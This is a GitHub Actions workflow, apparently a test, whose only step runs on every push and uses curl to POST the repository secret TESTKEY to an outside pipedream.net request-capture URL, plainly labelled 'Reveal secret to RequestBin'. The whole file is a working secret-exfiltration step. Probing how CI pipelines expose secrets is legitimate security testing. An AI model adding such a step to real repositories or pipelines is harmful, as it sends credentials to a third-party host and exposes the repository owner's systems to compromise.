name: TEST
on: [push]

jobs:
  build:
    name: TEST
    runs-on: ubuntu-latest
    steps:
      - name: Reveal secret to RequestBin
        run: |
          curl -d "{ \"SECRET\": \"$TESTKEY\" }" -H "Content-Type: application/json" https://enxedtnmy8u9c.x.pipedream.net/
        env:
          TESTKEY: ${{ secrets.TESTKEY }}
